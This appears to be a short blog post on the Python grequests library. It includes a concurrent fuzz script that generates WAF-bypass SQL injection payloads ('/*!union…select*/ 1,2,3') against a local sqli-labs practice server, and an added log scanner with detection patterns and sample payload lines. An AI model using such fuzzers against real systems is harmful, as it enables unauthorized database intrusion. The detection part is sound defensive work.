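A library that wraps gevent + requests.
I originally wanted to use the scrapy framework for the fuzz test (scrapy is asynchronous too), but it went the same way as with grequests: the server I set up for local testing couldn't take it...
OK, some notes on grequests: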
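import grequests

urls = ["http://www.baidu.com", "http://www.qq.com", "http://www.baidu.com"]
# Build the unsent requests lazily, then send them all concurrently
req = (grequests.get(u) for u in urls)
resp = grequests.map(req)
for i in resp:
    if i is None:  # grequests.map returns None for a request that failed
        continue
    print(i.text)
    print(i.url)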
Fuzz script:
#coding=utf-8
import grequests
fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00','/*','*/','/*!','?','*','=','`','~','!','@','%','.','-','+','|','%00','%20' ,'%09', '%0a', '%0b', '%0c', '%0d' , '%a0' ,'/**/']
fuzz_sz = ['', ' ','0','1','2','3','4','5','6','7','8','9']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j","%0k","%0l","%0m","%0n", "%0o","%0p","%0q","%0r","%0s","%0t","%0u","%0v","%0w","%0x","%0y","%0z"]
fuzz = fuzz_ch + fuzz_sz + fuzz_zs
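base_url = "http://192.168.182.156/sqli-labs-master/Less-1/?id=1"
urls = []  # URLs queued for the current batch

def check(batch):
    # Send one batch concurrently and print the URLs that were not blocked and returned the row
    rets = grequests.map(grequests.get(u) for u in batch)
    for ret in rets:
        if ret is None:  # the request failed, so there is no response to inspect
            continue
        s = ret.text
        if "网站防火墙" not in s:  # "网站防火墙" ("website firewall") marks the WAF block page
            if "Your Login name:Dumb" in s:
                print(ret.url)

for i in fuzz:
    for j in fuzz:
        for k in fuzz:
            # Build from base_url each time; appending to url itself would make every request longer than the last
            url = base_url + "' /*!union" + i + j + k + "select*/" + " 1,2,3 --+"
            urls.append(url)
            if len(urls) == 1000:
                check(urls)
                urls = []
if urls:  # send whatever is left after the loops
    check(urls)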
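In the end, most of the test responses were 414. The server was handling too many threads at once, but it can't process them at anything like the speed of the CPU.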
2019.4.29
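
A defender-side counterpart, as an added example that is not part of the original post: a scan of web-server access logs for the payload shape the script above sends (SQL keywords inside a MySQL `/*! ... */` comment) and for 414 responses per client. It also flags plain `union ... select`, which goes beyond the post; the combined log format, the client IPs and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# MySQL executes the body of a /*! ... */ comment, so "/*!union<filler>select*/"
# still reaches the database as UNION SELECT whatever the filler is.
VERSIONED_BODY = re.compile(r"/\*!(.*?)(?:\*/|$)", re.S)
KEYWORD = re.compile(r"union|select", re.I)
UNION_SELECT = re.compile(r"union.{0,16}?select", re.I | re.S)
# Common/combined access-log layout (assumed): client ip, request line, status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return why a request target looks like the fuzz payload, or None."""
    query = unquote(target.partition("?")[2])  # decode %0a, %20, ... first
    if any(KEYWORD.search(body) for body in VERSIONED_BODY.findall(query)):
        return "keyword-in-versioned-comment"
    if UNION_SELECT.search(query):
        return "union-select"
    return None

def scan(lines):
    """Per client IP, count payload hits and 414 (URI Too Long) responses."""
    stats = defaultdict(Counter)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed layout
        ip, target, status = m.groups()
        reason = classify(target)
        if reason:
            stats[ip][reason] += 1
        if status == "414":
            stats[ip]["414"] += 1
    return stats

# Constructed sample log lines (not taken from the original post).
SAMPLE_LOG = """\
192.168.182.1 - - [29/Apr/2019:10:00:01 +0800] "GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1" 200 721
192.168.182.1 - - [29/Apr/2019:10:00:02 +0800] "GET /sqli-labs-master/Less-1/?id=1'%20/*!union%0a%0b1select*/%201,2,3%20--+ HTTP/1.1" 200 745
192.168.182.1 - - [29/Apr/2019:10:00:02 +0800] "GET /sqli-labs-master/Less-1/?id=1'%20/*!union*/%0a1select*/%201,2,3%20--+ HTTP/1.1" 200 745
192.168.182.1 - - [29/Apr/2019:10:00:03 +0800] "GET /sqli-labs-master/Less-1/?id=1'%20/*!union%0g%0h%0iselect*/%201,2,3%20--+ HTTP/1.1" 414 341
192.168.182.7 - - [29/Apr/2019:10:00:04 +0800] "GET /index.php?q=student+union HTTP/1.1" 200 512
192.168.182.9 - - [29/Apr/2019:10:00:05 +0800] "GET /index.php?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 403 199
""".splitlines()

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, dict(counts))
```

The query string is decoded before matching, so fillers such as `%0a` or `%20` between the keywords do not hide them from the patterns.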